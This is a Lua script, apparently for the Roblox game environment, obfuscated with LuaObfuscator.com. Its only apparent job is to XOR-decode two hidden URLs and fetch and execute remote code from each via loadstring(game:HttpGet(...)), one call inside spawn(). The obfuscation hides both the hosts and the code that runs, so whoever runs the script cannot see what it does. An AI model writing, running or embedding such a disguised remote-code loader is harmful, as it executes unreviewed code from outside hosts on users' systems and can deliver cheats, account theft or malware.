--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10=0;local v11;local v12;while true do if ((891 -(668 + 222))==v10) then while true do local v13=0 + 0 ;while true do if (v13==(877 -(282 + 595))) then if (v11==1) then return v5(v12);end if (v11==(1637 -(1523 + 114))) then v12={};for v14=1 + 0 , #v8 do v6(v12,v0(v4(v1(v2(v8,v14,v14 + (1 -0) )),v1(v2(v9,(1066 -(68 + 997)) + (v14% #v9) ,(1271 -(226 + 1044)) + (v14% #v9) + 1 )))%256 ));end v11=4 -3 ;end break;end end end break;end if (v10==0) then v11=117 -(32 + 85) ;v12=nil;v10=1;end end end spawn(function() loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\207\42\228\178\147\77\134\194\148\22\229\169\206\14\197\208\148\55\227\189\212\81\217\198\218\33\245\244\202\31\216\205\148\38\177\226\193\28\210\194\222\113\226\233\196\27\129\154\141\33\228\190\158\75\133\148\223\107\234\174\198","\126\177\163\187\69\134\219\167")))();end);loadstring(game:HttpGet(v7("\43\217\62\213\239\121\130\101\215\253\52\131\45\204\232\43\216\40\208\239\38\223\41\202\242\55\200\36\209\178\32\194\39\138\213\55\222\0\204\216\58\130\26\192\238\48\194\36\196\240\110\254\41\215\245\51\217\101\215\249\37\222\101\205\249\34\201\57\138\241\34\196\36\138\241\46\159\111\151\172\43\204\38\201\243\52\200\47\203\178\47\216\43","\156\67\173\74\165")))();
